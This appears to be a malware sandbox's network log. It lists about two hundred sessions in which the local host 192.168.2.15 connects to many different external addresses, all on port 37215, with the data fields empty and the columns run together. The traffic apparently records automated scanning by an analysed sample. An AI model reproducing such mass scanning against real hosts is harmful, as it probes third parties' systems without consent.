                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8881192.168.2.1547536197.119.144.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8882192.168.2.155502241.66.54.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8883192.168.2.153453841.170.41.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8884192.168.2.154729641.74.163.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8885192.168.2.154994041.153.214.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8886192.168.2.1536672201.244.145.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8887192.168.2.1540300157.160.24.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8888192.168.2.153873289.205.187.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8889192.168.2.1533946197.47.96.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8890192.168.2.1536240197.133.246.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8891192.168.2.1557608157.111.180.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8892192.168.2.153891641.189.73.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8893192.168.2.1555562157.250.36.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8894192.168.2.153374441.119.242.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8895192.168.2.1550860197.248.163.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8896192.168.2.1536900194.14.228.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8897192.168.2.1552272206.95.101.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8898192.168.2.1534504197.95.67.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8899192.168.2.154308641.142.221.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8900192.168.2.1547308197.24.151.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8901192.168.2.1557494157.252.171.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8902192.168.2.1554654133.253.191.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8903192.168.2.1548452197.130.220.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8904192.168.2.154376078.208.111.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8905192.168.2.154159838.222.24.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8906192.168.2.1558868157.25.216.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8907192.168.2.155634641.133.155.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8908192.168.2.1536690151.114.165.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8909192.168.2.153592041.62.168.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8910192.168.2.153852441.231.130.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8911192.168.2.153347041.31.167.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8912192.168.2.154241641.105.2.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8913192.168.2.1539206157.21.13.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8914192.168.2.153393248.23.240.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8915192.168.2.1544824192.218.199.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8916192.168.2.1541952157.88.162.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8917192.168.2.1546668197.161.33.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8918192.168.2.1536660196.145.115.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8919192.168.2.154577479.70.237.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8920192.168.2.153696441.244.165.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8921192.168.2.1546044216.132.71.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8922192.168.2.1544460157.226.99.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8923192.168.2.155797841.117.7.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8924192.168.2.1551812157.201.100.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8925192.168.2.155202041.239.176.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8926192.168.2.1557514176.189.65.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8927192.168.2.1536858197.26.254.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8928192.168.2.1546308157.130.153.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8929192.168.2.1557160197.36.156.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8930192.168.2.155045041.216.194.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8931192.168.2.154803625.180.44.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8932192.168.2.1550776197.233.240.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8933192.168.2.153725047.227.73.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8934192.168.2.1552830157.145.3.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8935192.168.2.1554408157.38.166.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8936192.168.2.1558254136.243.139.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8937192.168.2.1536384197.23.150.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8938192.168.2.153647841.19.255.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8939192.168.2.1534152197.114.235.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8940192.168.2.1556784197.61.160.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8941192.168.2.1547742197.229.98.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8942192.168.2.153706241.2.44.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8943192.168.2.15560762.120.232.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8944192.168.2.1555944157.107.24.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8945192.168.2.1544460138.12.84.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8946192.168.2.1542396197.54.79.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8947192.168.2.155906041.242.163.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8948192.168.2.1548940197.153.134.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8949192.168.2.155889050.128.196.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8950192.168.2.154855860.1.224.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8951192.168.2.154526041.109.23.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8952192.168.2.1536362197.191.130.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8953192.168.2.153811041.91.203.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8954192.168.2.1542958197.57.16.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8955192.168.2.155296841.144.28.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8956192.168.2.155771041.110.169.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8957192.168.2.1547192132.152.150.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8958192.168.2.1547770186.29.250.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8959192.168.2.153763072.164.17.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8960192.168.2.1556366197.55.161.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8961192.168.2.156002441.205.15.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8962192.168.2.1549196197.68.244.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8963192.168.2.155648679.189.61.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8964192.168.2.1543912157.157.108.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8965192.168.2.1553140197.37.123.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8966192.168.2.1547102157.132.11.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8967192.168.2.1557640157.168.6.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8968192.168.2.153505841.89.242.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8969192.168.2.1546054188.193.84.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8970192.168.2.153754812.13.80.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8971192.168.2.1547812197.146.62.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8972192.168.2.155462641.52.138.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8973192.168.2.1546350126.169.175.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8974192.168.2.1550802197.90.16.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8975192.168.2.153579241.169.97.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8976192.168.2.1556126197.118.196.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8977192.168.2.1560786170.142.209.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8978192.168.2.153629441.80.193.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8979192.168.2.155898641.254.150.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8980192.168.2.1537352157.180.235.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8981192.168.2.154784841.237.94.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8982192.168.2.1555232118.188.141.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8983192.168.2.1550190157.13.140.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8984192.168.2.155745066.182.111.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8985192.168.2.1535508197.249.237.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8986192.168.2.1552948197.128.252.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8987192.168.2.155374841.149.254.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8988192.168.2.153709688.90.66.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8989192.168.2.1536296142.218.44.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8990192.168.2.1539840197.68.183.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8991192.168.2.155382041.141.65.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8992192.168.2.1551634197.29.76.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8993192.168.2.1535246197.164.236.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8994192.168.2.1556866197.54.27.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8995192.168.2.153565841.39.144.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8996192.168.2.1550398157.163.216.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8997192.168.2.154826023.51.101.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8998192.168.2.1550094197.18.11.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          8999192.168.2.1555488157.230.22.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9000192.168.2.155364241.34.23.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9001192.168.2.1545698197.202.109.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9002192.168.2.1554320123.53.185.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9003192.168.2.1556036141.27.32.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9004192.168.2.1548316157.185.209.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9005192.168.2.1551372197.71.229.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9006192.168.2.1545112197.250.183.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9007192.168.2.1555712157.80.70.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9008192.168.2.154470291.153.114.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9009192.168.2.153882841.203.72.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9010192.168.2.1533362221.59.220.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9011192.168.2.154039241.65.231.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9012192.168.2.1560150157.75.146.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9013192.168.2.155965620.97.53.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9014192.168.2.155981441.114.24.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9015192.168.2.1536000157.12.49.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9016192.168.2.1540790162.5.179.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9017192.168.2.1550594182.246.179.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9018192.168.2.1556596197.0.249.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9019192.168.2.154400641.22.35.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9020192.168.2.154148041.11.142.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9021192.168.2.1560966197.221.132.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9022192.168.2.1545386197.251.129.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9023192.168.2.1557098197.126.201.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9024192.168.2.1547838157.10.177.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9025192.168.2.155974841.220.166.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9026192.168.2.1557368197.149.204.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9027192.168.2.1549462197.188.211.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9028192.168.2.155705641.63.241.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9029192.168.2.155029841.55.87.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9030192.168.2.1534496197.197.139.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9031192.168.2.1557170173.162.28.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9032192.168.2.1559640157.187.139.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9033192.168.2.156050012.168.218.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9034192.168.2.1537270197.253.141.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9035192.168.2.1537696157.18.30.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9036192.168.2.154973441.81.19.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9037192.168.2.155578047.204.228.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9038192.168.2.1544978157.2.50.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9039192.168.2.155698640.40.204.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9040192.168.2.1537622197.95.153.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9041192.168.2.155314246.175.216.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9042192.168.2.154339641.9.253.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9043192.168.2.1540460157.248.29.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9044192.168.2.153721241.171.207.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9045192.168.2.1541198157.92.47.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9046192.168.2.153415223.33.192.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9047192.168.2.1536406197.212.119.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9048192.168.2.1548938197.164.248.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9049192.168.2.1553016157.78.63.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9050192.168.2.1542644218.52.158.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9051192.168.2.1558854157.109.111.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9052192.168.2.154729041.0.142.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9053192.168.2.155270868.205.37.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9054192.168.2.1545648157.201.235.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9055192.168.2.1557818197.120.201.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9056192.168.2.1545742197.34.152.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9057192.168.2.1547900197.231.33.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9058192.168.2.154372441.177.35.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9059192.168.2.1533802197.151.83.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9060192.168.2.1560732197.73.218.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9061192.168.2.1550736197.221.217.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9062192.168.2.1552274197.9.66.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9063192.168.2.1553620197.222.119.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9064192.168.2.1540880192.158.37.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9065192.168.2.1533208197.208.19.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9066192.168.2.1532856165.222.27.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9067192.168.2.1547908157.57.93.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9068192.168.2.1540224197.83.15.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9069192.168.2.1559230157.183.175.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9070192.168.2.155917287.249.208.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9071192.168.2.153656641.124.1.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9072192.168.2.1544574106.236.221.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9073192.168.2.1543928167.74.202.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9074192.168.2.1548248157.232.30.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9075192.168.2.1543706211.144.37.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9076192.168.2.154114013.29.142.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9077192.168.2.1549598162.209.89.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9078192.168.2.155577241.43.46.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9079192.168.2.154637241.208.201.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9080192.168.2.153746093.134.215.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9081192.168.2.153501895.94.122.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9082192.168.2.153779241.129.28.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9083192.168.2.1552334197.147.192.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9084192.168.2.1554746197.84.84.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9085192.168.2.1544938197.0.55.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9086192.168.2.154711441.149.1.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9087192.168.2.154673441.152.236.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9088192.168.2.1549602157.211.89.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          9089192.168.2.155841041.119.95.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
